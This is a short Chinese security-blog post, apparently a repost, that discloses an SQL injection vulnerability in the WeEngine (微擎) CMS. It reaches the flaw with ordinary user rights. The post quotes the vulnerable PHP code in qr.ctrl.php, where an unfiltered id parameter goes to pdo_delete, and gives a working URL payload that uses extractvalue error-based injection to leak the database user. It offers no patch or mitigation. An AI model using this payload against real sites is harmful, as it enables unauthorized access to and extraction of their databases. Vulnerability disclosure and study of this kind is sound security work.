微擎普通用户权限SQL注入漏洞

没穿底裤 2020年1月1日06:56:37评论4,107 views字数 477阅读1分35秒阅读模式
摘要

漏洞文件:web/source/platform/qr.ctrl.php代码行:204左右 $_GPC['id']未过滤构造payload:

漏洞文件:web/source/platform/qr.ctrl.php

代码行:204左右

if($do == 'delsata') {     $id = $_GPC['id'];     $b = pdo_delete('qrcode_stat',array('id' =>$id, 'uniacid' => $_W['uniacid']));     if ($b){         message('删除成功',url('platform/qr/display'),'success');     }else{         message('删除失败',url('platform/qr/display'),'error');     } }

 

$_GPC['id']未过滤

构造payload:

http://localhost/we7/web/index.php ?c=platform &a=qr &do=delsata&id[0]=1/&id[1]=)/**/and/**/extractvalue(1,/**/concat(0x5c,/**/(select/**/user())))--+

 

demo测试

微擎普通用户权限SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日06:56:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   微擎普通用户权限SQL注入漏洞https://cn-sec.com/archives/76937.html

发表评论

匿名网友 填写信息